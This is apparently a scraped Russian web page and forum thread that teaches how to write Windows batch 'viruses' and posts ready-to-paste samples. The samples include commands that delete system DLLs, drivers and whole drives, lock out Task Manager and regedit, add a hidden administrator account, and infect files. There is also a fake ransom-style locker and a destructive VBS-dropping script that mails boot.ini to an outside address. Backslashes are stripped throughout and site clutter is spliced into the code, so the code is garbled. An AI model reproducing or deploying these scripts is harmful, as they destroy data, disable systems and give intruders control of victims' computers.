Скрипты для бат вирусов

В этой статье я постараюсь объяснить, как создавать вредоносные программы (вирусы, трояны), используя штатные средства Windows и не только. Начнём мы с создания так называемых ВАТ-файлов или просто bat’ников, для этого нам понадобится всего лишь стандартный Блокнот Windows. Создаём файл *.txt и открываем его. Теперь нам нужно забить в него определённые команды, примеры которых вы видите ниже:

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul – Запретить комбинацию клавиш Ctrl-Alt-Del

del "%SystemRoot%system32*.dll" /q >nul – Удалить все системные DLL(Динамические загружаемые библиотеки)

del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul – Удалить все драйверы, установленные на компьютере

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – Поменять местами значения кнопок мыши

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – Делает невозможным запуск приложений

time 0:00 >nul – Поставить время на 00:00

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – Запретить редактирование реестра вручную

del "%SystemRoot%Cursors*.*" >nul – Удалить курсор мыши

del "%SystemRoot%Media" /q >nul – Удалить системные звуки Windows

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – Запретить вызов панели кправления

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – Убрать рабочий стол

shutdown -r -t 1 -c "lol" -f >nul – Форсираванная перезагрузка ПК

shutdown -s -t 1 -c "lol" -f >nul – Форсированное выключение ПК

taskkill /f /im explorer.exe >nul – Убить процесс Explorer.exe

net share "ResName"="C:" >nul – Расшарить диск C:

label C:Диск >nul – Переименовать диск С:

msg * "Текст сообщения" >nul – Показать Windows-стилизованное сообщение с кнопкой ОК

del "%0" >nul – Самоликвидация вируса

А теперь комментарии. Команда del направлена на удаление определённого файла, после неё в кавычках пишется полный путь к файлу, если вы хотите удалить из папки все файлы с расширением txt, например, то после название целевой папки и дроби нужно написать *.txt. Если нужно удалить что-нибудь из директории Windows, гораздо проще будет написать %SystemRoot%, вместо полного пути к директории, а уже затем вводить остальной путь. Также получившийся вирус может самоуничтожаться, для этого вместо пути к целевому файлу нужно ввести %0. Команда reg add может редактировать содержимое реестра. Для этого после этой команды нужно написать полный путь к необходимому вам ключу(без кавычек), и его новое значение. Команда time просто устанавливает любое время на часах ПК. Команда shutdown выполняет выключение или перезагрузку ПК, если после команды стоит r -t 1 -c "lol", то произойдёт перезагрузка, а если -s -t 1 -c "lol", то выключение. Также можно добавить в конце –f через пробел, тогда операция (выключение или перезагрузка) произойдёт форсированно, т.е. без предупреждения пользователя. Команда
taskkill /f /im убивает указанный процесс, а указать его надо через пробел с расширением. Также существует команда net share, которая расшаривает (открывает общий доступ из сети) определённый диска на компьютере. После нее нужно написать в кавычках название расшаренного ресурса (на ваше усмотрение) после этого знак = и буквенный идентификатор диска в кавычках с двоеточием и дробью. Комадна label переименовывает указаный диск, для этого напишите буквенный идентификатор диска, знак =, и новое название. Команда msg * выводит на экран окно с сообщением и кнопкой ОК, после неё надо написать текст сообщения в кавычках через пробел после команды. Теперь, когда вы записали необходимые вам команды, сохраните созданный *.txt с расширением *.bat
Также вы можете писать подобные вирусы не вручную, а используя специальные программы, автоматизирующие данный процесс. Могу порекомендовать одну такую программу, это BAT Virus Master. Спасибо за внимание, всех благ:)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

X-Shar

Здесь готовые Bat-вирусы. Просто ставляем код в bat файл и все.

Убирает рабочий стол

@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

@echo off
shutdown -s -t 1 -c "lol" >nul

@echo off
shutdown -r -t 1 -c "lol" >nul

Запрещает запускать программы

@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul

Читайте также:  Чему равно произведение логарифмов с одинаковым основанием

@echo off
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

Удаляет звуки Windows

@echo off
del "%SystemRoot%Media" /q >nul

Запрещает заходить в панель управления

@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrent VersionPoliciesExplorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши

del "%SystemRoot%Cursors*.*" >nul

Меняет название корзины

reg add HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache /v @C:WINDOWSsystem32SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f

X-Shar

Открываем блокнот, пишем:
md 1
md 2
md 3
md 4
Команда md создает папку, в данном случае у нас создастся четыре папки с названиями 1,2,3 и 4. На первый взгляд весьма бесполезная команда, но с её помощью можно создать жесткие тормоза на компе.
Открываем Microsoft Office Excel, двойной клик по верхней левой ячейке, вписываем в эту ячейку md 1
Кликаем по правому нижнему краю ЯЧЕЙКИ и тянем вниз. Если все сделано правильно, ячейки начнут размножаться, увеличивая цифру +1. Держим столько, сколько хотим чтобы у нас появилось папок (чем больше, тем сильнее будут тормоза)
Скопируйте все это и вставьте в наш блокнот. Сохраните и переименуйте из .txt в .bat
При открытии начнут создаваться папки, это будет долгий процесс и комп будет страшно пыхтеть. Удалить все эти папки будет еще сложнее
Не рекомендую тестировать на своём компьютере

X-Shar

rd [Буква_Диск]: /s /q

Удаляет все файлы в program files :
del c:/rogram Files/q

Убивает процесс explorer.exe:
taskkill /f /im explorer.exe >nul

Создает миллион папок:
FOR /L %%i IN (1,1,1000000) DO md %%i

Удаляет все драйвера, которые установлены на компьютере:
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

Удаляет команду DEL:
del %0

Будет открывать бесконечно Пэинт:
😡
Start mspaint
goto x

Изменяет расширение всех ярлыков на .txt:
assoc .lnk=.txt

Заражает Autoexec:
copy ""%0"" "%SystemRoot%system32atinit.bat" >nul
reg add "HKCUSOFTWAREMicrosoftCommand Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%syste m32atinit.bat" /f >nul

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить):
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

Cбой системы (!) – выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать:
rundll32 user,disableoemlayer

Меняет местами кнопки мыши,но обратная смена не возможна):
rundll32 user,SwapMouseButton

Sascha

Заместитель Администратора

Простенькие вирусы:
Убирает рабочий стол
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Выключается компьютер
@echo off
shutdown -s -t 1 -c "lol" >nul

Перезагрузка компьютера
@echo off
shutdown -r -t 1 -c "lol" >nul

Запрещает запускать программы
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul

Удаление дров
@echo off
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

Удаляет звуки Windows
@echo off
del "%SystemRoot%Media" /q >nul

Запрещает заходить в панель управления
@echo off
reg add HKCUSoftwareMicrosoftWindowsCurrent VersionPoliciesExplorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши
del "%SystemRoot%Cursors*.*" >nul

Меняет название корзины
reg add HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache /v @C:WINDOWSsystem32SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f

Удаляет ВСЕ с разделадиска(не пытайтесь проверить у себя)
rd [Буква_Диск]: /s /q

Удаляет все файлы в program files
del c:Program Files/q

Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul

Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i

Удаляет все драйвера, которые установлены на компьютере
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

Удаляет команду DEL
del %0

Будет открывать бесконечно Paint
😡
Start mspaint
goto x

Изменяет расширение всех ярлыков на .txt
assoc .lnk=.txt

Заражает Autoexec
copy ""%0"" "%SystemRoot%system32atinit.bat" >nul
reg add "HKCUSOFTWAREMicrosoftCommand Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%syste m32atinit.bat" /f >nul

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

Читайте также:  Работа в рамблере отзывы

сбой системы (!) – выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer

Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton

Удаляет ядро системы
del %systemroot%system32HAL.dll

Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает
не только в текущем каталоге, но и надкаталоге)
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb" c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (..*.jpg ..*.doc ..*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Вирус заражает *.JPG в текущем каталоге
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb" c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Жестокие вирусы:
У вашего ламера будет глючить компьютер.
@echo off
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%windowssystem32
undll32.vbs
echo do >> %systemdrive%windowssystem32
undll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%windowssystem32
undll32.dat", True) >> %systemdrive%windowssystem32
undll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%windowssystem32
undll32.vbs
echo tx.close >> %systemdrive%windowssystem32
undll32.vbs
echo FSO.DeleteFile "%systemdrive%windowssystem32
undll32.dat" >> %systemdrive%windowssystem32
undll32.vbs
echo loop >> %systemdrive%windowssystem32
undll32.vbs
start %systemdrive%windowssystem32
undll32.vbs
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v system_host_run /t REG_SZ /d %systemdrive%windowssystem32
undll32.vbs /f

Вирус который убивает Винду. Не проверяйте на своем компьютере=)
@echo This virus created by LIZA
@echo Virus: pcforumhack.ru™ Virus
@echo Autor: LIZA
@echo off
echo Chr(39)>%temp% emp1.vbs
echo Chr(39)>%temp% emp2.vbs
echo on error resume next > %temp% emp.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp% emp.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp% emp.vbs
reg add HKEY_USERSS-1-5-21-343818398-1417001333-725345543-1003SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v nodesktop /d 1 /freg add HKEY_USERSS-1-5-21-343818398-1417001333-725345543-1003SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v > copy %¶§% %SystemRoot%user32dll.bat
reg add "hklmSoftwareMicrosoftWindowsCurrentVersionRun" /v RunExplorer32 /d %SystemRoot%user32dll.bat /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoDrives /t REG_DWORD /d 67108863 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile "C:
tldr",1 >> %temp% emp.vbs
reg add "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions" /v "NoSelectDownloadDir" /d 1 /f
reg add "HKLMSOFTWAREMicrosoftInternet ExplorermainFeatureControlFeature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
reg add "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions" /v "NoFindFiles" /d 1 /f
reg add "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions" /v "NoNavButtons" /d 1 /f
echo fso.deletefolder "D:Windows",1 >> %temp% emp.vbs
echo fso.deletefolder "I:Windows",1 >> %temp% emp.vbs
echo fso.deletefolder "C:Windows",1 >> %temp% emp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot") >> %temp% emp.vbs
echo fso.deletefile sr+"system32hal.dll",1 >> %temp% emp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot") >> %temp% emp.vbs
echo fso.deletefolder sr+"system32dllcache",1 >> %temp% emp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot") >> %temp% emp.vbs
echo fso.deletefolder sr+"system32drives",1 >> %temp% emp.vbs
echo s.regwrite "HKEY_CLASSES_ROOTCLSID<645FF040-5081-101B-9F08-00AA002F954E>LocalizedString","forum.whack.ru™">>%temp% emp.vbs
echo s.regwrite "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner","forum.whack.ru™">>%temp% emp.vbs
echo s.regwrite "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization","forum.whack.ru™">>%temp% emp.vbs
echo on error resume next > %temp% emp1.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp% emp1.vbs
echo do>>%temp% emp1.vbs
echo fso.getfile ("A:")>>%temp% emp1.vbs
echo loop>>%temp% emp1.vbs
echo on error resume next > %temp% emp2.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp% emp2.vbs
echo do>>%temp% emp2.vbs
echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp% emp2.vbs
echo loop>>%temp% emp2.vbs
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v disableregistrytools /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesNonEnum" /v <20D04FE0-3AEA-1069-A2D8-08002B30309D>/t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoSetFolders /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFind /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoSMHelp /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoRun /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoClose /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject("shell.application")>>%temp% emp.vbs
echo application.minimizeall>>%temp% emp.vbs
reg add "hklmSoftwareMicrosoftWindowsCurrentVersion
un" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add "HKCRexefileshellopencommand" /ve /t REG_SZ /d rundll32.exe /f
echo i=50 >> %temp% emp.vbs
echo while i^>0 or i^ > %temp% emp.vbs
echo S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16 >> %temp% emp.vbs
echo i=i-1 >> %temp% emp.vbs
echo wend >> %temp% emp.vbs
echo do >> %temp% emp.vbs
echo wscript.sleep 200 >> %temp% emp.vbs
echo s.sendkeys"" >> %temp% emp.vbs
echo wscript.sleep 200 >> %temp% emp.vbs
echo s.sendkeys"" >> %temp% emp.vbs
echo wscript.sleep 200 >> %temp% emp.vbs
echo s.sendkeys"" >> %temp% emp.vbs
echo loop>> %temp% emp.vbs
echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp% emp.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %temp% emp.vbs
echo if colCDROMs.Count ^>= 1 then >> %temp% emp.vbs
echo For i = 0 to colCDROMs.Count – 1 >> %temp% emp.vbs
echo colCDROMs.Item(i).eject >> %temp% emp.vbs
echo next >> %temp% emp.vbs
echo End If >> %temp% emp.vbs
echo Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", ". ", "Копм заражен!") >> %temp% emp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp% emp.vbs
echo Set iMsg = CreateObject("CDO.Message") >> %temp% emp.vbs
echo Set iConf = CreateObject("CDO.Configuration") >> %temp% emp.vbs
echo Set Flds = iConf.Fields >> %temp% emp.vbs
echo Flds.Item("

Читайте также:  Как открыть новый скайп

") = 25 >> %temp% emp.vbs
echo Flds.Update >> %temp% emp.vbs
echo iMsg.Configuration = iConf >> %temp% emp.vbs
echo iMsg.To = strTo >> %temp% emp.vbs
echo iMsg.From = strFrom >> %temp% emp.vbs
echo iMsg.Subject = strSubject >> %temp% emp.vbs
echo iMsg.TextBody = strBody >> %temp% emp.vbs
echo iMsg.AddAttachment "c:oot.ini" >> %temp% emp.vbs
echo iMsg.Send >> %temp% emp.vbs
echo End Function >> %temp% emp.vbs
echo Set iMsg = Nothing >> %temp% emp.vbs
echo Set iConf = Nothing >> %temp% emp.vbs
echo Set Flds = Nothing >> %temp% emp.vbs

echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1 >> %temp% emp.vbs
start %temp% emp.vbs
start %temp% emp1.vbs
start %temp% emp2.vbs

Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)
@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус.
title Внимание.
CHCP 866
IF EXIST C:windowsoot.bat (
goto ok )
cls
IF NOT EXIST C:windowsoot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:.reg
ECHO. >> C:.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >> C:.reg
ECHO. >> C:.reg
ECHO "Shell"="Explorer.exe, C:\windows\boot.bat " >> C:.reg
start/wait regedit -s C:.reg
del C:.reg
ECHO @echo off >>C:windowsoot.bat
ECHO C:WINDOWSsystem32 askkill.exe /f /im Explorer.exe >>C:windowsoot.bat
ECHO reg add "HKCUsoftwareMicrosoftWindowsCurrentVersionPoliciessystem" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:windowsoot.bat
ECHO start sys.bat >>C:windowsoot.bat
attrib +r +a +s +h C:windowsoot.bat
copy virus.bat c:windowssys.bat
attrib +r +a +s +h C:windowssys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if "%choise%" == "101" goto gold
if "%choise%" == "200393" goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:windowsoot.bat
del C:windowsoot.bat
attrib -r -a -s -h C:windowssys.bat
del C:windowssys.bat
cls
:gold
start C:
:end

Добавляет программу в автозагрузку ОС
copy ""%0"" "%SystemRoot%system32File.bat"
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v "Filel" /t REG_SZ /d "%SystemRoot%system32File.bat" /f
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f

Этот вирус,блокирует все программы,но интернет работает.
@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD

@echo off
chcp 1251
echo щаска.
color 4
@echo Вас собирается

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Adblock detector